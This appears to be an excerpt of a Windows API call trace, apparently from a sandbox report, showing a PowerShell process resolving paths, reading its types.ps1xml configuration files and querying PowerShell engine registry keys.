	[0616.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0616.900] SetErrorMode (uMode=0x1) returned 0x1
	[0616.900] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d350 | out: lpFileInformation=0x24d350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0616.900] SetErrorMode (uMode=0x1) returned 0x1
	[0616.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0616.900] SetErrorMode (uMode=0x1) returned 0x1
	[0616.900] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d350 | out: lpFileInformation=0x24d350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0616.901] SetErrorMode (uMode=0x1) returned 0x1
	[0616.904] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.904] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.905] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.905] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.906] GetACP () returned 0x4e4
	[0616.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0616.920] SetErrorMode (uMode=0x1) returned 0x1
	[0616.920] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0616.920] GetFileType (hFile=0x324) returned 0x1
	[0616.920] SetErrorMode (uMode=0x1) returned 0x1
	[0616.920] GetFileType (hFile=0x324) returned 0x1
	[0617.421] ReadFile (in: hFile=0x324, lpBuffer=0x2e97c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2e97c88*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.425] ReadFile (in: hFile=0x324, lpBuffer=0x2e97c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2e97c88*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.425] ReadFile (in: hFile=0x324, lpBuffer=0x2e97c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2e97c88*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.426] ReadFile (in: hFile=0x324, lpBuffer=0x2e97c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2e97c88*, lpNumberOfBytesRead=0x24d288*=0xcf3, lpOverlapped=0x0) returned 1
	[0617.426] ReadFile (in: hFile=0x324, lpBuffer=0x2e970e3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2e970e3*, lpNumberOfBytesRead=0x24d288*=0x0, lpOverlapped=0x0) returned 1
	[0617.426] ReadFile (in: hFile=0x324, lpBuffer=0x2e97c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2e97c88*, lpNumberOfBytesRead=0x24d288*=0x0, lpOverlapped=0x0) returned 1
	[0617.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0617.429] SetErrorMode (uMode=0x1) returned 0x1
	[0617.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d200 | out: lpFileInformation=0x24d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0617.429] SetErrorMode (uMode=0x1) returned 0x1
	[0617.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0617.430] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x324) returned 0x0
	[0617.430] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d26c, lpData=0x0, lpcbData=0x24d268*=0x0 | out: lpType=0x24d26c*=0x1, lpData=0x0, lpcbData=0x24d268*=0x56) returned 0x0
	[0617.430] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c4a00
	[0617.431] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d23c, lpData=0x1b8c4a00, lpcbData=0x24d238*=0x56 | out: lpType=0x24d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d238*=0x56) returned 0x0
	[0617.431] CoTaskMemFree (pv=0x1b8c4a00) 
	[0617.431] RegCloseKey (hKey=0x324) returned 0x0
	[0617.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0617.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0617.627] VirtualQuery (in: lpAddress=0x24bfd0, lpBuffer=0x24ce90, dwLength=0x30 | out: lpBuffer=0x24ce90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0617.635] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0617.636] GetFileType (hFile=0x318) returned 0x1
	[0617.636] SetErrorMode (uMode=0x1) returned 0x1
	[0617.636] GetFileType (hFile=0x318) returned 0x1
	[0617.636] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.640] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.640] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.640] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.641] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.641] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.641] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.641] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.641] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.643] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.643] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.644] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.644] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.644] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.645] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.645] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.645] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.648] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.648] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.649] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.649] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.649] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.649] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.650] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.650] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.650] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.651] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.651] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.651] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.652] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.652] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.652] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.653] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.659] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.659] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.660] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.660] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.661] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.661] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.661] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.662] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1000, lpOverlapped=0x0) returned 1
	[0617.662] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x1b4, lpOverlapped=0x0) returned 1
	[0617.662] ReadFile (in: hFile=0x318, lpBuffer=0x2d62200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d288, lpOverlapped=0x0 | out: lpBuffer=0x2d62200*, lpNumberOfBytesRead=0x24d288*=0x0, lpOverlapped=0x0) returned 1
	[0617.662] CloseHandle (hObject=0x318) returned 1
	[0617.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0617.663] SetErrorMode (uMode=0x1) returned 0x1
	[0617.663] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d200 | out: lpFileInformation=0x24d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0617.663] SetErrorMode (uMode=0x1) returned 0x1
	[0617.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0617.663] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2e8 | out: phkResult=0x24d2e8*=0x318) returned 0x0
	[0617.663] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d26c, lpData=0x0, lpcbData=0x24d268*=0x0 | out: lpType=0x24d26c*=0x1, lpData=0x0, lpcbData=0x24d268*=0x56) returned 0x0
	[0617.663] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c4bc0
	[0617.664] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d23c, lpData=0x1b8c4bc0, lpcbData=0x24d238*=0x56 | out: lpType=0x24d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d238*=0x56) returned 0x0
	[0617.664] CoTaskMemFree (pv=0x1b8c4bc0) 
	[0617.664] RegCloseKey (hKey=0x318) returned 0x0
	[0617.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0617.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0621.876] VirtualQuery (in: lpAddress=0x24bfd0, lpBuffer=0x24ce90, dwLength=0x30 | out: lpBuffer=0x24ce90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0624.982] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0624.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.982] CoTaskMemFree (pv=0x1b8c08b0) 
	[0625.883] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d488 | out: phkResult=0x24d488*=0x2fc) returned 0x0
	[0625.884] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x24d49c, lpData=0x0, lpcbData=0x24d498*=0x0 | out: lpType=0x24d49c*=0x1, lpData=0x0, lpcbData=0x24d498*=0x74) returned 0x0
	[0625.884] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x24d40c, lpData=0x0, lpcbData=0x24d408*=0x0 | out: lpType=0x24d40c*=0x1, lpData=0x0, lpcbData=0x24d408*=0x74) returned 0x0
	[0625.884] CoTaskMemAlloc (cb=0x78) returned 0x4701a0
	[0625.884] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x24d3dc, lpData=0x4701a0, lpcbData=0x24d3d8*=0x74 | out: lpType=0x24d3dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d3d8*=0x74) returned 0x0
	[0625.884] CoTaskMemFree (pv=0x4701a0) 
	[0625.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0625.884] SetErrorMode (uMode=0x1) returned 0x1
	[0625.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d360 | out: lpFileInformation=0x24d360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0625.884] SetErrorMode (uMode=0x1) returned 0x1
	[0625.885] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0625.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.886] CoTaskMemFree (pv=0x1b8c08b0) 
	[0625.891] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0625.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.891] CoTaskMemFree (pv=0x1b8c08b0) 
	[0625.891] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0625.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.891] CoTaskMemFree (pv=0x1b8c08b0) 
	[0625.892] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
